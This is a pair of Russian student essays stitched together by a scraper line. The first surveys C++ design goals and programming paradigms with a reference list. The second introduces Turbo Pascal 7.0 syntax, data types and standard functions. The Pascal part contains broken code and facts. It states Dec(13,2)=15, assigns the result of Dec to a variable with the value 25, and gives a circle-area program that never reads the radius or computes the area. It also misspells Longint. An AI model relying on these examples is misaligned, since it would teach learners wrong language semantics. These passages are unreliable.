Для изучения С++ не обязательно знать С. Программирование на С способствует усвоению приемов и даже трюков, которые при программировании на С++ становятся просто ненужными. Например, явное преобразование типа (приведение) , в С++ нужно гораздо реже, чем в С (см. "Замечания для программистов на С" ниже). Тем не менее, хорошие программы на языке С по сути являются программами на С++. Например, все программы из классического описания С [8] являются программами на С++. В процессе изучения С++ будет полезен опыт работы с любым языком со статическими типами.
Замечание для программистов на С
Чем лучше программист знает С, тем труднее будет для него при программировании на С++ отойти от стиля программирования на С. Так он теряет потенциальные преимущества С++.
Но гораздо важнее стараться думать о программе как о множестве взаимосвязанных понятий, представляемых классами и объектами, чем представлять ее как сумму структур данных и функций, что-то делающих с этими данными.
Эффективность и структура
Развитие языка С++ происходило на базе языка С, и, за небольшим исключением, С был сохранен в качестве подмножества C++. Базовый язык С был спроектирован таким образом, что имеется очень тесная связь между типами, операциями, операторами и объектами, с которыми непосредственно работает машина, т.е. числами, символами и адресами. За исключением операций new, delete и throw, а также проверяемого блока, для выполнения операторов и выражений С++ не требуется скрытой динамической аппаратной или программной поддержки.
Первоначально язык С задумывался как конкурент ассемблера, способный вытеснить его из основных и наиболее требовательных к ресурсам задач системного программирования. В проекте С++ были приняты меры, чтобы успехи С в этой области не оказались под угрозой. Различие между двумя языками прежде все состоит в степени внимания, уделяемого типам и структурам. Язык С выразителен и в то же время снисходителен по отношению к типам. Язык С++ еще более выразителен, но такой выразительности можно достичь лишь тогда, когда типам уделяют большое внимание. Когда типы объектов известны, транслятор правильно распознает такие выражения, в которых иначе программисту пришлось бы записывать операции с утомительными подробностями. Кроме того, знание типов позволяет транслятору обнаруживать такие ошибки, которые в противном случае были бы выявлены только при тестировании. Отметим, что само по себе использование строгой типизации языка для контроля параметров функции, защиты данных от незаконного доступа, определения новых типов и операций не влечет дополнительных расходов памяти и увеличения времени выполнения программы.
В проекте С++ особое внимание уделяется структурированию программы. Это вызвано увеличением размеров программ со времени появления С. Небольшую программу (скажем, не более 1000 строк) можно заставить из упрямства работать, нарушая все правила хорошего стиля программирования. Однако, действуя так, человек уже не сможет справиться с большой программой. Если у вашей программы в 10 000 строк плохая структура, то вы обнаружите, что новые ошибки появляются в ней так же быстро, как удаляются старые. С++ создавался с целью, чтобы большую программу можно было структурировать таким образом, чтобы одному человеку не пришлось работать с текстом в 25000 строк. В настоящее время можно считать, что эта цель полностью достигнута.
Существуют, конечно, программы еще большего размера. Однако те из них, которые действительно используются, обычно можно разбить на несколько практически независимых частей, каждая из которых имеет значительно меньший упомянутого размер. Естественно, трудность написания и сопровождения программы определяется не только числом строк текста, но и сложностью предметной области. Так что приведенные здесь числа, которыми обосновывались наши соображения, не надо воспринимать слишком серьезно.
К сожалению, не всякую часть программы можно хорошо структурировать, сделать независимой от аппаратуры, достаточно понятной и т.д. В С++ есть средства, непосредственно и эффективно представляющие аппаратные возможности. Их использование позволяет избавиться от беспокойства о надежности и простоте понимания программы. Такие части программы можно скрывать, предоставляя надежный и простой интерфейс с ними.
Естественно, если С++ используется для большой программы, то это означает, что язык используют группы программистов. Полезную роль здесь сыграют свойственные языку модульность, гибкость и строго типизированные интерфейсы. В С++ есть такой же хороший набор средств для создания больших программ, как во многих языках. Но когда программа становится еще больше, проблемы по ее созданию и сопровождению перемещаются из области языка в более глобальную область программных средств и управления проектом.
В этой книге основное внимание уделяется методам создания универсальных средств, полезных типов, библиотек и т.д. Эти методы можно успешно применять как для маленьких, так и для больших программ. Более того, поскольку все нетривиальные программы состоят из нескольких в значительной степени независимых друг от друга частей, методы программирования отдельных частей пригодятся как системным, так и прикладным программистам.
Может возникнуть подозрение, что запись программы с использованием подробной системы типов, увеличит размер текста. Для программы на С++ это не так: программа на С++, в которой описаны типы формальных параметров функций, определены классы и т.п., обычно бывает даже короче своего эквивалента на С, где эти средства не используются. Когда в программе на С++ используются библиотеки, она также оказывается короче своего эквивалента на С, если, конечно, он существует.
КРАТКИЙ ОБЗОР С++
Язык программирования С++ задумывался как язык, который будет:
- лучше языка С;
- поддерживать абстракцию данных;
поддерживать объектно-ориентированное программирование.
С++ - язык общего назначения и задуман для того, чтобы настоящие программисты получили удовольствие от самого процесса программирования. За исключением второстепенных деталей он содержит язык С как подмножество. Язык С расширяется введением гибких и эффективных средств, предназначенных для построения новых типов. Программист структурирует свою задачу, определив новые типы, которые точно соответствуют понятиям предметной области задачи. Такой метод построения программы обычно называют абстракцией данных. Информация о типах содержится в некоторых объектах типов, определенных пользователем. С такими объектами можно работать надежно и просто даже в тех случаях, когда их тип нельзя установить на стадии трансляции. Программирование с использованием таких объектов обычно называют объектно-ориентированным. Если этот метод применяется правильно, то программы становятся короче и понятнее, а сопровождение их упрощается.
Ключевым понятием С++ является класс. Класс - это определяемый пользователем тип. Классы обеспечивают упрятывание данных, их инициализацию, неявное преобразование пользовательских типов, динамическое задание типов, контролируемое пользователем управление памятью и средства для перегрузки операций. В языке С++ концепции контроля типов и модульного построения программ реализованы более полно, чем в С. Кроме того, С++ содержит усовершенствования, прямо с классами не связанные: символические константы, функции-подстановки, стандартные значения параметров функций, перегрузка имен функций, операции управления свободной памятью и ссылочный тип. В С++ сохранены все возможности С эффективной работы с основными объектами, отражающими аппаратную "реальность" (разряды, байты, слова, адреса и т.д.). Это позволяет достаточно эффективно реализовывать пользовательские типы.
Объектно-ориентированное программирование - это метод программирования, способ написания "хороших" программ для множества задач. Если этот термин имеет какой-то смысл, то он должен подразумевать: такой язык программирования, который предоставляет хорошие возможности для объектно-ориентированного стиля программирования.
Нельзя сказать, что один язык лучше другого только потому, что в нем есть возможности, которые в другом отсутствуют. Часто бывает как раз наоборот. Здесь более важно не то, какими возможностями обладает язык, а то, насколько имеющиеся в нем возможности поддерживают избранный стиль программирования для определенного круга задач.
Язык С++ проектировался для поддержки абстракции данных и объектно-ориентированного программирования в добавление к традиционному стилю С. Впрочем, это не значит, что язык требует какого-то одного стиля программирования от всех пользователей.
ПАРАДИГМЫ ПРОГРАММИРОВАНИЯ:
Процедурное программирование
Первоначальной (и, возможно, наиболее используемой) парадигмой программирования было:
Определите, какие процедуры вам нужны; используйте лучшие из известных вам алгоритмов!
Ударение делалось на обработку данных с помощью алгоритма, производящего нужные вычисления. Для поддержки этой парадигмы языки предоставляли механизм передачи параметров и получения результатов функций. Литература, отражающая такой подход, заполнена рассуждениями о способах передачи параметров, о том, как различать параметры разных типов, о различных видах функций (процедуры, подпрограммы, макрокоманды, ...) и т.д. Первым процедурным языком был Фортран, а Алгол60, Алгол68, Паскаль и С продолжили это направление.
Модульное программирование
Со временем при в проектировании программ акцент сместился с организации процедур на организацию структур данных. Помимо всего прочего это вызвано и ростом размеров программ. Модулем обычно называют совокупность связанных процедур и тех данных, которыми они управляют.
Парадигма программирования приобрела вид:
Определите, какие модули нужны; поделите программу так, чтобы данные были скрыты в этих модулях
Эта парадигма известна также как "принцип сокрытия данных". Если в языке нет возможности сгруппировать связанные процедуры вместе с данными, то он плохо поддерживает модульный стиль программирования. Теперь метод написания "хороших" процедур применяется для отдельных процедур модуля.
Поскольку данные есть единственная вещь, которую хотят скрывать, понятие упрятывания данных тривиально расширяется до понятия упрятывания информации, т.е. имен переменных, констант, функций и типов, которые тоже могут быть локальными в модуле. Хотя С++ и не предназначался специально для поддержки модульного программирования, классы поддерживают концепцию модульности ($$5.4.3 и $$5.4.4). Помимо этого С++, естественно, имеет уже продемонстрированные возможности модульности, которые есть в С, т.е. представление модуля как отдельной единицы трансляции.
Абстракция данных
Модульное программирование предполагает группировку всех данных одного типа вокруг одного модуля, управляющего этим типом.
Конечно такое решение намного лучше, чем хаос, свойственный традиционным, неструктурированным решениям, но моделируемые таким способом типы совершенно очевидно отличаются от "настоящих", встроенных. Каждый управляющий типом модуль должен определять свой собственный алгоритм создания "переменных" этого типа. Не существует универсальных правил присваивания идентификаторов, обозначающих объекты такого типа. У "переменных" таких типов не существует имен, которые были бы известны транслятору или другим системным программам, и эти "переменные" не подчиняются обычным правилам областей видимости и передачи параметров.
Тип, реализуемый управляющим им модулем, по многим важным аспектам существенно отличается от встроенных типов. Такие типы не получают той поддержки со стороны транслятора (разного вида контроль), которая обеспечивается для встроенных типов. Проблема здесь в том, что программа формулируется в терминах небольших (одно-два слова) дескрипторов объектов, а не в терминах самих объектов. Это означает, что транслятор не сможет отловить глупые, очевидные ошибки.
Иными словами, концепция модульности, поддерживающая парадигму упрятывания данных, не запрещает такой стиль программирования, но и не способствует ему.
В языках Ада, Clu, С++ и подобных им эта трудность преодолевается благодаря тому, что пользователю разрешается определять свои типы, которые трактуются в языке практически так же, как встроенные. Такие типы обычно называют абстрактными типами данных, хотя лучше, пожалуй, их называть просто пользовательскими. Более строгим определением абстрактных типов данных было бы их математическое определение. Если бы удалось его дать, то, что мы называем в программировании типами, было бы конкретным представлением действительно абстрактных сущностей.
Парадигму же программирования можно выразить теперь так:
Определите, какие типы вам нужны; предоставьте полный набор операций для каждого типа.
Если нет необходимости в разных объектах одного типа, то стиль программирования, суть которого сводится к упрятыванию данных, и следование которому обеспечивается с помощью концепции модульности, вполне адекватен этой парадигме.
Большинство модулей (хотя и не все) лучше определять как пользовательские типы.
Пределы абстракции данных
Абстрактный тип данных определяется как некий "черный ящик". После своего определения он по сути никак не взаимодействует с программой. Его никак нельзя приспособить для новых целей, не меняя определения. В этом смысле это негибкое решение.
Объектно-ориентированное программирование
Объектно-ориентированное программирование наилучшим образом предоставляет технологию управления элементами любой сложности, создавая условия для многократного использования программных компонентов и объединения данных с методами их обработки.
Суть объектно-ориентированного программирования заключается в использовании концепции “объектов” , то есть, скорее, образов, чем данных.
Руководящая идея этого подхода заключается в стремлении связать данные с обрабатывающими эти данные методами в единое целое - объект. Объекты имеют характеристики и возможности.
Фактически объектно-ориентированное программирование можно рассматривать как модульное программирование нового уровня, когда вместо во многом случайного, механического объединения процедур и данных акцент делается на их смысловую связь.
Объектная модель способна одинаково хорошо описать как элементы управления графического интерфейса (типа кнопок и раскрывающихся списков), так и реальные объекты(велосипед, самолёт, кота и воду). Таким образом, задача объектно-ориентированного программирования состоит в том, чтобы правильно представить эти объекты на языке программирования.
В языке C++ полностью поддерживаются принципы объектно-ориентированного программирования, включая три кита, на которых оно состоит: инкапсуляцию, наследование и полиморфизм.
Инкапсуляция
Совмещение структур данных с функциями (методами), предназначенными для манипулирования этими данными. Инкапсуляция достигается путём введения класса нового механизма структурирования и типизации данных.
Наследование
Создание новых, производных классов, которые наследуют данные и функции от одного или нескольких ранее определённых базовых классов. При этом возможно переопределение или добавление новых данных и методов. В результате создаётся иерархия классов.
Полиморфизм
Присвоение методу единого имени или идентификатора в рамках иерархии классов таким образом, чтобы любой класс в иерархии имел возможность по-своему выполнять связанные с этим методом действия.
Одновременно с появлением и детализацией концепции появились и основанные на ней языки программирования. Одним из первых явился алгоритмический язык Modula 2. Язык программирования Turbo Pascal, разработанный фирмой Borland, начиная с версии 5.5 стал объектно-ориентированным. Но наиболее последовательно воплощение концепция объектно-ориентированного программирования нашла в алгоритмическом языке C++.
Пусть, например, нужно определить для графической системы тип shape (фигура). Проблема состоит в том, что мы не различаем общие свойства фигур (например, фигура имеет цвет, ее можно нарисовать и т.д.) и свойства конкретной фигуры (например, окружность - это такая фигура, которая имеет радиус, она изображается с помощью функции, рисующей дуги и т.д.).
Суть объектно-ориентированного программирования в том, что оно позволяет выражать эти различия и использует их. Язык, который имеет конструкции для выражения и использования подобных различий, поддерживает объектно-ориентированное программирование. Все другие языки не поддерживают его. Здесь основную роль играет механизм наследования, заимствованный из языка Симула.
Те функции, для которых можно определить заявленный интерфейс, но реализация которых (т.е. тело с операторной частью) возможна только для конкретных фигур, отмечены служебным словом virtual (виртуальные). В Симуле и С++ виртуальность функции означает: "функция может быть определена позднее в классе, производном от данного".
Определите, какой класс вам необходим; предоставьте полный набор операций для каждого класса; общность классов выразите явно с помощью наследования.
Если общность между классами отсутствует, вполне достаточно абстракции данных. Насколько применимо объектно-ориентированное программирование для данной области приложения определяется степенью общности между разными типами, которая позволяет использовать наследование и виртуальные функции. В некоторых областях, таких, например, как интерактивная графика, есть широкий простор для объектно-ориентированного программирования. В других областях, в которых используются традиционные арифметические типы и вычисления над ними, трудно найти применение для более развитых стилей программирования, чем абстракция данных. Здесь средства, поддерживающие объектно-ориентированное программирование, очевидно, избыточны.
Нахождение общности среди отдельных типов системы представляет собой нетривиальный процесс. Степень такой общности зависит от способа проектирования системы. В процессе проектирования выявление общности классов должно быть постоянной целью. Она достигается двумя способами: либо проектированием специальных классов, используемых как "кирпичи" при построении других, либо поиском похожих классов для выделения их общей части в один базовый класс.
Для представления на С++ множества взаимозависимых классов можно использовать дружественные классы ($$5.4.1).
Еще один способ выражения общности понятий в языке предоставляют шаблоны типа. Шаблонный класс задает целое семейство классов. Например, шаблонный класс список задает классы вида "список объектов T", где T может быть произвольным типом. Таким образом, шаблонный тип указывает, как получается новый тип из заданного в качестве параметра. Самые типичные шаблонные классы - это контейнеры, в частности, списки, массивы и ассоциативные массивы.
Улучшенный С (поддержка процедурного и модульного программирования)
Минимальная поддержка процедурного программирования включает функции, арифметические операции, выбирающие операторы и циклы. Помимо этого должны быть предоставлены операции ввода- вывода. Базовые языковые средства С++ унаследовал от С (включая указатели), а операции ввода-вывода предоставляются библиотекой.
Самая зачаточная концепция модульности реализуется с помощью механизма раздельной трансляции.
Поддержка абстракции данных
Поддержка программирования с абстракцией данных в основном сводится к возможности определить набор операций (функции и операции) над типом. Все обращения к объектам этого типа ограничиваются операциями из заданного набора. Однако, имея такие возможности, программист скоро обнаруживает, что для удобства определения и использования новых типов нужны еще некоторые расширения языка. Хорошим примером такого расширения является
перегрузка операций.
Поддержка объектно-ориентированного программирования
Поддержку объектно-ориентированного программирования обеспечивают классы вместе с механизмом наследования, а также механизм вызова функций-членов в зависимости от истинного типа объекта (дело в том, что возможны случаи, когда этот тип неизвестен на стадии трансляции). Особенно важную роль играет механизм вызова функций-членов. Не менее важны средства, поддерживающие абстракцию данных (о них мы говорили ранее). Все доводы в пользу абстракции данных и базирующихся на ней методов, которые позволяют естественно и красиво работать с типами, действуют и для языка, поддерживающего объектно-ориентированное программирование. Успех обоих методов зависит от способа построения типов, от того, насколько они просты, гибки и эффективны. Метод объектно-ориентированного программирования позволяет определять более общие и гибкие пользовательские типы по сравнению с теми, которые получаются, если использовать только абстракцию данных.
Итак, мы указали, какую минимальную поддержку должен обеспечивать язык программирования для процедурного программирования, для упрятывания данных, абстракции данных и объектно-ориентированного программирования.
Пределы совершенства
Язык С++ проектировался как "лучший С", поддерживающий абстракцию данных и объектно-ориентированное программирование. При этом он должен быть пригодным для большинства основных задач системного программирования.
Основная трудность для языка, который создавался в расчете на методы упрятывания данных, абстракции данных и объектно-ориентированного программирования, в том, что для того, чтобы быть языком общего назначения, он должен:
- идти на традиционных машинах;
- сосуществовать с традиционными операционными системами и языками;
- соперничать с традиционными языками программирования в эффективности
выполнения программы;
- быть пригодным во всех основных областях приложения.
Это значит, что должны быть возможности для эффективных числовых операций (арифметика с плавающей точкой без особых накладных расходов, иначе пользователь предпочтет Фортран) и средства такого доступа к памяти, который позволит писать на этом языке драйверы устройств. Кроме того, надо уметь писать вызовы функций в достаточно непривычной записи, принятой для обращений в традиционных операционных системах. Наконец, должна быть возможность из языка, поддерживающего объектно-ориентированное программирование, вызывать функции, написанные на других языках, а из других языков вызывать функцию на этом языке, поддерживающем объектно-ориентированное программирование.
Далее, нельзя рассчитывать на широкое использование искомого языка программирования как языка общего назначения, если реализация его целиком полагается на возможности, которые отсутствуют в машинах с традиционной архитектурой.
Если не вводить в язык возможности низкого уровня, то придется для основных задач большинства областей приложения использовать некоторые языки низкого уровня, например С или ассемблер. Но С++ проектировался с расчетом, что в нем можно сделать все, что допустимо на С, причем без увеличения времени выполнения. Вообще, С++ проектировался, исходя из принципа, что не должно возникать никаких дополнительных затрат времени и памяти, если только этого явно не пожелает сам программист.
Язык проектировался в расчете на современные методы трансляции, которые обеспечивают проверку согласованности программы, ее эффективность и компактность представления. Основным средством борьбы со сложностью программ видится, прежде всего, строгий контроль типов и инкапсуляция. Особенно это касается больших программ, создаваемых многими людьми. Пользователь может не являться одним из создателей таких программ, и может вообще не быть программистом. Поскольку никакую настоящую программу нельзя написать без поддержки библиотек, создаваемых другими программистами, последнее замечание можно отнести практически ко всем программам.
С++ проектировался для поддержки того принципа, что всякая программа есть модель некоторых существующих в реальности понятий, а класс является конкретным представлением понятия, взятого из области приложения ($$12.2). Поэтому классы пронизывают всю программу на С++, и налагаются жесткие требования на гибкость понятия класса, компактность объектов класса и эффективность их использования. Если работать с классами будет неудобно или слишком накладно, то они просто не будут использоваться, и программы выродятся в программы на "лучшем С". Значит пользователь не сумеет насладиться теми возможностями, ради которых, собственно, и создавался язык.
Заключение
Как было обещано в первом издании книги «Бьерн Страуструп. Язык программирования С++ », запросы пользователей определили развитие С++. Его направлял опыт широкого круга пользователей, работающих в разных областях программирования. За шесть лет, отделяющих нас от первого издания описания С++, число пользователей возросло в сотни раз. За эти годы были усвоены многие уроки, были предложены и подтвердили практикой свое право на существование различные приемы программирования.
Язык C++ явился мощным и стремительным рывком в развитии программирования. C++ и по сей день занимает господствующее положение среди языков программирования в мире. Огромное множество профессиональных программистов использует именно его при разработке разного рода проектов. Очевидно, этот язык будет сохранять свое солидное положение ещё не один год, при этом по-прежнему развиваясь и совершенствуясь.
Список литературы
«Бьерн Страуструп. Язык программирования С++»
Джесс либерти, «Освой самостоятельно C++ за 21 день», изд. Дом «Вильямс», Москва - Санкт-Петербург – Киев, 2001
Н. Секунов, «Самоучитель Visual C++ 6», изд. «БХВ-Петербург», Санкт-Петербург, 2003
Ссылки на литературу
Здесь приведен список книг и статей, на которые есть прямые ссылки, а также тех, которые только упоминаются.
[1] A.V.Aho, J.E.Hopcroft, and J.D.Ulman: Data Structures and Algoritms. Addison-Wesley, Reading, Massachusetts. 1983.
[2] O-J.Dahl, B.Myrhaug, and K.Nugaard: SIMULA Common Base Language. Norwegian Computing Ctnter S-22. Oslo, Norway. 1970
[3] O-J.Dahl and C.A.R.Hoare: Hierarhical Program Construction in Structured Programming. Academic Press, New York. 1972. pp. 174-220.
[4] Margaret A.Ellis and Bjarne Stroustrup: The Annotated C++ Reference Manual. Addison-Wesley, Reading, Massachusetts. 1990.
[5] A.Goldberg and D.Rodson: SMALLTALK-80 - The Language and Its Implementation. Addison-Wesley, Reading, Massachusetts. 1983.
[6] R.E.Griswold et.al.: The Snobol14 Programming Language. Prentice-Hall, Englewood Cliffs, New Jersy, 1970.
[7] R.E.Griswold and M.T.Griswold: The ICON Programming Language. Prentice-Hall, Englewood Cliffs, New Jersy. 1983.
[8] Brian W.Kernighan and Dennis M.Ritchie: The C Programming Language. Prentice-Hall, Englewood Cliffs, New Jersy. 1978. Second edition 1988.
[9] Andrew Koenig and Bjarne Stroustrup: C++: As Close to C as possible - but no closer. The C++ Report. Vol.1 No.7. July 1989.
[10] Andrew Koenig and Bjarne Stroustrup: Exception Handling for C++ (revised). Proc USENIX C++ Conference, April 1990. Also, Journal of Object Oriented Programming, Vol.3 No.2, July/August 1990. pp.16-33.
[11] Barbara Liskov et.al.: CLU Reference Manual. MIT/LCS/TR-225.
[12] George Orwell: 1984. Secker and Warburg, London. 1949.
[13] Martin Richards and Colin Whitby-Strevens: BCPL - The Language and Its Compiler. Cambridge University Press. 1980.
[14] L.Rosler: The Evolution of C - Past and Future. AT&T Bell Laboratories Technical Journal. Vol.63 No.8 Part 2. October 1984. pp.1685-1700.
[15] Ravi Sethi: Uniform Syntax for Type Expressions and Declarations. Software Practice & Experience, Vol.11. 1981. pp.623-628.
[16] Bjarne Stroustrup: Adding Classes to C: An Exercise in Language Evolution. Software Practice & Experience, Vol.13. 1983. pp.139-61.
[17] Bjarne Stroustrup: The C++ Programming Language. Addison-Wesley. 1986.
[18] Bjarne Stroustrup: Multiple Inheritance for C++. Proc. EUUG Spring Conference, May 1987. Also USENIX Computer Systems, Vol.2 No 4, Fall 1989.
[19] Bjarne Stroustrup and Jonathan Shopiro: A Set of C classes for Co-Routine Style Programming. Proc. USENIX C++ conference, Santa Fe. November 1987. pp.417-439.
[20] Bjarne Stroustrup: Type-safe Linkage for C++. USENIX Computer Systems, Vol.1 No.4 Fall 1988.
[21] Bjurne Stroustrup: Parameterized Type for C++. Proc. USENIX C++ Conference, Denver, October 1988. pp.1-18. Also, USENIX Computer Systems, Vol.2 No.1 Winter 1989.
[22] Bjarne Stroustrup: Standardizing C++. The C++ Report. Vol.1 No.1. January 1989.
[23] Bjarne Stroustrup: The Evolution of C++: 1985-1989. USENIX Computer Systems, Vol.2 No.3. Summer 1989.
[24] P.M.Woodward and S.G.Bond: Algol 68-R Users Guide. Her Majesty's Stationery Office, London. 1974.
[25] UNIX Time-Sharing System: Programmer's Manual. Research Version, Tenth Edition. AT&T Bell Laboratories, Murray Hill, New Jersy, February 1985.
[26] Aake Wilkstroem: Functional Programming Using ML. Prentice-Hall, Englewood Cliffs, New Jersy. 1987.
[27] X3 Secretariat: Standard - The C Language. X3J11/90-013. Computer and Business Equipment Manufactures Association, 311 First Street, NW, Suite 500, Washington, DC 20001, USA. |
https://doc4web.ru/informatika/yazik-paskal-osnovnie-elementi-yazika-struktura-programmi.html | Язык Paskal. Основные элементы языка. Структура программы | https://doc4web.ru/uploads/files/132/1855c94a503b9aa26e3ca5266cc70a68.docx | files/1855c94a503b9aa26e3ca5266cc70a68.docx | Содержание
Введение
1. Структура программы
2. Алфавит языка
3. Простейшие конструкции
4. Выражения
5. Типы данных
6. Операции
Заключение
Литература
Введение
Тема реферата "Язык Paskal. Основные элементы языка. Структура программы" по дисциплине "Вычислительная техника и основы программирования".
Цель работы – раскрыть основные понятия структуру программы; алфавит языка; простейшие конструкции; выражения; типы данных; операции; стандартные функции.
Автором первой версии (1968 г.) алгоритмического языка Pascal является Никлаус Вирт (профессор, директор института Информатики Швейцарской высшей политехнической школы -1970г., лауреат премии Тьюринга за 1984г.).
В языке Pascal сконцентрировались многие лучшие черты языков предшественников.
В 1992г. фирма Borland International выпустила два пакета программирования, основанные на использовании языка Pascal: Borland Pascal 7.0 и Turbo- Pascal 7.0. Первый включает три режима работы: обычный режим MS DOS, защищенный режим MS DOS и режим Windows. Второй позволяет работать только в обычном режиме MS DOS, что позволяет использовать его практически на любом современном персональном компьютере. Начинающим программистам целесообразнее начинать изучение языка именно с пакета Turbo-Pascal 7.0.
1. Структура программы
Логически программа в среде Turbo-Pascal 7.0 состоит из двух частей:
- описательной (секция определения данных);
- исполнительной (секция определения действий).
{Секция определения данных}
Label ...; {раздел определения меток}
Const ...; {раздел определения констант}
Type ...; {раздел определения новых типов}
Var ...; {раздел определения переменных}
function ...; {раздел определения программных
procedure ...; единиц}
{ Секция определения действий}
Begin
...
end.
Язык Pascal является языком строгой спецификации данных, поэтому в секции определения данных должны быть описаны все используемые в программе метки, установлены значения констант, описаны имена новых типов данных, описаны переменные и определены пользовательские процедуры и функции.
Секция определения действий включает последовательность операторов, отделенных друг от друга точкой с запятой. Признаком конца программы является символ - точка.
Программа может включать пояснительные надписи - комментарии, которые представляют собой произвольные тексты, заключенные в фигурные скобки { ...} или (* .. *) и расположенные в любом месте программы.
Пример:
{Программа вычисления площади круга и длины окружности}
{секция определения данных}
Var R,S,D: real;
procedure OKR;
begin
D:=2*3.1415*R
end;
{секция определения действий}
Begin
Writeln(‘Введите значение радиуса R’);
OKR;
Writeln(‘Площадь круга =’, S);
Writeln(‘Длина окружности =’,D)
end.
2. Алфавит языка
Алфавит - совокупность допустимых в языке символов или групп символов, рассматриваемых как единое целое. В среде Turbo-Pascal 7.0 все компоненты формируются из множества символов стандарта ASCII (American Standard Code for Information Interchange).
Буквы: прописные и строчные буквы латинского алфавита: Aa, Bb, .., Zz.
Цифры: 0…9.
Специальные символы : ( ); [ ]; { }; (* *); .; ,; :; ;; @; #; ^ ; $; _; :=; ...
*) Знаки арифметических операций: +; -; *; /; div mod;
Знаки отношений: <; <=; >; >=; =; <>.
Знаки логических операций: not; and; or; xor.
*) Подробнее о назначении и использовании знаков операций см. в разд. Типы данных.
Типы данных
В состав алфавита входят также зарезервированные слова (например, begin, end, if, then, else, for и т.д.), которые воспринимаются как единый символ алфавита и могут использоваться в программах только по своему прямому назначению. Полный перечень зарезервированных слов см. [5].
3. Простейшие конструкции
Идентификатор - используется для обозначения имен переменных, констант, функций, процедур и других программных единиц. Идентификатор представляет собой любую последовательность букв, цифр и знаков, начинающуюся с буквы (распознаются идентификаторы в среде Turbo-Pascal по первым 63 символам; прописные и строчные буквы не различаются).
Пример:
Summa Неверно
ALPHA -12
Set_1 СУММА
Game_25 25_Game
Метка - в среде Turbo-Pascal в качестве метки может использоваться либо целое число без знака из диапазона 0..9999 , либо идентификатор.
Метками при необходимости помечают операторы в программе, от оператора метка отделяется символом двоеточие.
Пример:
M1: Y:=X + Z;
99: Write(Y);
145: end; {пустой оператор}
4. Выражения
Выражение - это синтаксическая единица языка, определяющая способ вычисления некоторого значения, подробнее см.[5, 14]. Выражения в среде Turbo-Pascal формируются из констант, переменных, функций, знаков операций и круглых скобок.
Пример:
(A + B) * Sin(C) {арифметическое выражение}
A + B - C <> 0 {выражение отношения}
(A - B > 0) and (C + A=0) {логическое выражение}
5. Типы данных
Turbo-Pascal предполагает строгую типизацию данных, то есть в программе в секции определения данных должны быть определены все типы объектов, используемых в секции определения действий.
Типы данных Turbo-Pascal
6. Операции
Стандартные
Целые
Целые переменные, значения которых принадлежат одному из указанных диапазонов:
Тип
Диапазон
Размер, байт
Shortint
-128..127
1
Integer
-32768..32767
2
Ljngint
-2147483648..2147483647
4
Byte
0..255
1
Word
0..65535
2
Примеры операций, допустимых над данными целого типа
Арифметические операции:
+
сложение;
-
вычитание;
*
умножение;
Div
деление нацело:13 Div 2=6;
Mod
остаток от деления:13 Mod 2=1.
Стандартные функции:
Dec(X,N)
изменение X на N:Dec(13,2)=15;
Inc(X)
увеличение X на 1:Inc(13)=14;
Odd(X)
определение четности: Odd(13)=True, Odd(12)=False;
Abs(X)
абсолютная величина X:Abs(-13)=13;
Sqr(X)
возведение в квадрат: Sqr(2)=4.
Var X,Y:integer;
Let:byte;
...
X:=15;;Let:=10;
Y:=X mod 5;{Значение Y=0} Y:=X div 4;{Значение Y=3}
Y:=Dec(X,Let);{Значение Y=25} Y:=X-Let;{Значение Y=5}.
Вещественные
Вещественные переменные, значения которых принадлежат одному из указанных диапазонов:
Тип
Диапазон
Размер, байт
Real
2.9E-39..1.7E38
6
Single
1.5E-45..3.4E38
4
Double
5.0E-324..1.7E308
8
Extended
3.4E-4932..1.1E4932
10
Comp
-9.2E18..9.2E18
8
Примеры операций, допустимых над данными вещественного типа:
Арифметические операции: +,-,*, /(деление).
Стандартные функции:
Trunc(X) возвращает целую часть X, результат целый Trunc(12.95)=12;
Round(X) округляет X до ближайшего целого Round(12.95)=13;
Int(X) возвращает целую часть X, результат вещественный
Int(12.95)=12.0;
Frac(X) возвращает дробную часть X, результат вещественный
Frac(12.95)=0.95;
Sin(X) вычисляет значение SinX;
Cos(X) вычисляет значение CosX;
Ln(X) вычисляет значение LnX;
Exp(X) вычисляет значение экспоненциальной функции;
Sqrt(X) вычисляет значение корня квадратного из X;
Sqr(X) вычисляет значение квадрата X;
Abs(X) вычисляет модуль Х.
Var X,Y,Z:real;
...
X:=8.54;Y:=1.64E-3;
Z:=Frac(X);{Z=0.54}
Z:=Int(Y);{Z=0}
Логические (Boolean):
Логические переменные занимают 1 байт памяти и принимают одно из двух значений:
False ложь
True истина
Var Alpha:boolean;{описание типа логической переменной}
X,Y:real;
...
X:=0.5;Y:=1.5;
Alpha:=X>Y;{Alpha=False}
Alpha:=X<>Y;{Alpha=True}
Примеры операций, допустимых над данными логического типа:
Not операция логического отрицания НЕ;
And операция логического умножения И;
Or операция логического сложения ИЛИ;
Xor операция сравнения - исключительное ИЛИ.
Стандартная функция Ord(Alpha)=0 если аргумент Alpha=False и равна 1 если Alpha=True.
Таблица логических операций Var A,B:boolean;
A
B
not A
A and B
A or B
A xor B
False
False
True
False
False
False
False
True
True
False
True
True
True
False
False
False
True
True
True
True
False
True
True
False
Символьные (Char)
Символьные переменные занимают 1 байт памяти и их значениями служат символы ASCII-кода. К символьным данным применимы стандартные функции Pred, Succ, Ord.
Примеры операций, допустимых над данными символьного типа:
Var Lit1,Lit2:char;
Nom:byte;
...
Lit1:=’B’;Lit2:=Pred(Lit1);{Lit2=A}
Nom:=Ord(Lit2);{Nom=65 - ASCII-код символа ‘А’}
Lit1:=Chr(Nom);{Lit1=’A’ - обратное преобразование ASCII-кода в символ}
Заключение
В процессе написания работы были раскрыты основные понятия структуры программы; алфавит языка; простейшие конструкции; выражения; типы данных; операции; стандартные функции; приведены ряд примеров.
Литература
Абрамов С.А., Зима Е.В. Начала программирования на языке Паскаль. - М.: Наука, 1987;
Абрамов С.А., Зима Е.В. Начала информатики. - М.: Наука, 1988;
Довгаль С.И., Литвинов Б.Ю., Сбитнев А.И. Персональные ЭВМ: Турбо-Паскаль V7.0, Объектное программирование, Локальные сети. (Учебное пособие).- Киев, "Информсистема сервис", 1993;
Епанешников А.М., Епанешников В.А. Программирование в среде Turbo-Pascal 7.0 .- М.:, Диалог МИФИ, 1993;
Йенсен К., Вирт Н. Паскаль: Руководство для пользователя. /Пер. с англ. М.Л.Сальникова, Ю.В.Сальниковой. - М.:, Компьютер, 1993;
Перминов О.Н. Программирование на языке Паскаль. - М.: Радио и связь, 1988;
Поляков Д.Б., Круглов Н.Ю. Программирование в среде Турбо-Паскаля. - изд.МАИ., М.:, 1992;
